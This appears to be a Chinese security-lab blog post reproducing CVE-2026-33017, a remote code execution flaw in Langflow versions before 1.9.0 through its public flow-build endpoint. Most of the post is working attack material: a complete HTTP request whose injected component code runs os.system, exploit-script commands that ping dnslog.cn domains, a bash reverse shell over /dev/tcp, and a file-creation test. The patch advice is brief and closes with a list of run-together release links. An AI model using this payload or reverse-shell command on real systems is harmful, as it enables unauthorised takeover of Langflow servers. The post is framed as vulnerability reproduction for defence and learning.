文章总结： 该文档详述了Langflow框架在1.9.0之前版本存在的远程代码执行漏洞CVE-2026-33017，其源于API端点未过滤用户输入直接传入exec函数执行。文中提供了Docker环境搭建、详细的POC请求包及Python利用脚本，并通过DNSLog、反弹shell等方式成功复现了漏洞。最后给出了升级至最新版本及配置WAF规则的修复建议。 综合评分： 88 文章分类： 漏洞分析,漏洞POC,渗透测试

【成功复现】Langflow 远程代码执行漏洞(CVE-2026-33017)

原创

弥天安全实验室 弥天安全实验室

弥天安全实验室

2026年3月24日 18:24 陕西

网安引领时代，弥天点亮未来

0x00写在前面

本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！

0x01漏洞介绍

Langflow是Langflow开源的一个用于构建多代理和 RAG 应用程序的可视化框架。

Langflow 1.9.0之前版本存在安全漏洞，该漏洞源于/api/v1/build_public_tmp/{flow_id}/flow端点接受攻击者控制的流程数据并传递给exec函数，可能导致未经验证的远程代码执行。

0x02影响版本

Langflow 1.9.0之前版本

0x03漏洞复现

1.docker搭建环境

# 拉取受影响版本镜像（1.6.8）docker pull langflowai/langflow:1.6.8# 启动 Web 服务docker run -d -p 7860:7860 --name langflow-vuln langflowai/langflow:1.6.8

2.漏洞复现

1、访问漏洞环境

2、dnslog回显测试

POST /api/v1/build_public_tmp/0c8c94cb-dcbb-4343-904e-c62ea6158d40/flow HTTP/1.1Host: 192.168.3.28:7860User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveCookie: client_id=testContent-Length: 1157Content-Type: application/json
{"data": {"nodes": [{"id": "Test", "type": "genericNode", "position": {"x": 0, "y": 0}, "data": {"id": "Test", "type": "Test", "node": {"template": {"code": {"type": "code", "required": true, "show": true, "multiline": true, "value": "import os, socket, json as _json\n\n_command = os.system(\"5fhfzm.dnslog.cn\")\n\nfrom lfx.custom.custom_component.component import Component\nfrom lfx.io import Output\nfrom lfx.schema.data import Data\n\nclass ExploitComp(Component):\n    display_name=\"X\"\n    outputs=[Output(display_name=\"O\",name=\"o\",method=\"r\")]\n    def r(self)->Data:\n        return Data(data={})", "name": "code", "password": false, "advanced": false, "dynamic": false}, "_type": "Component"}, "description": "X", "base_classes": ["Data"], "display_name": "Test", "name": "Test", "frozen": false, "outputs": [{"types": ["Data"], "selected": "Data", "name": "o", "display_name": "O", "method": "r", "value": "__UNDEFINED__", "cache": true, "allows_loop": false, "tool_mode": false, "hidden": null, "required_inputs": null, "group_outputs": false}], "field_order": ["code"], "beta": false, "edited": false}}}], "edges": []}, "inputs": null}

python3 cve-2026-33017.py 192.168.3.28 -c "ping yob31u.dnslog.cn"

dns回显

3、反弹shell测试

python3 CVE-2026-33017.py --url http://192.168.3.28:7860 --cmd "bash -c 'bash -i >& /dev/tcp/192.168.3.28/12399 0>&1'"

4、创建文件测试

python3 cve-2026-33017.py -c "touch /tmp/mitian.txt"

通过反弹shell查看成功创建

已输出检测双向规则

0x04修复建议****

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

临时缓解方案

1、在 WAF、IDS/IPS 中部署基于 POC 的检测规则，识别针对该漏洞的探测与攻击行为。

建议尽快升级修复漏洞，再次声明本文仅供学习使用，非法他用责任自负！

https://github.com/langflow-ai/langflow/releaseshttps://github.com/langflow-ai/langflow/releases/tag/v1.9.0.dev8https://github.com/langflow-ai/langflow/releases/tag/v1.9.0.dev8

弥天简介

学海浩茫，予以风动，必降弥天之润！弥天安全实验室成立于2019年2月19日，主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子，也是民间组织。主要以技术共享、交流等不断赋能自己，赋能安全圈，为网络安全发展贡献自己的微薄之力。

口号 网安引领时代，弥天点亮未来

知识分享完了

喜欢别忘了关注我们哦~

学海浩茫，

予以风动，

必降弥天之润！

弥  天

安全实验室

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：弥天安全实验室 弥天安全实验室 弥天安全实验室《【成功复现】Langflow 远程代码执行漏洞(CVE-2026-33017)》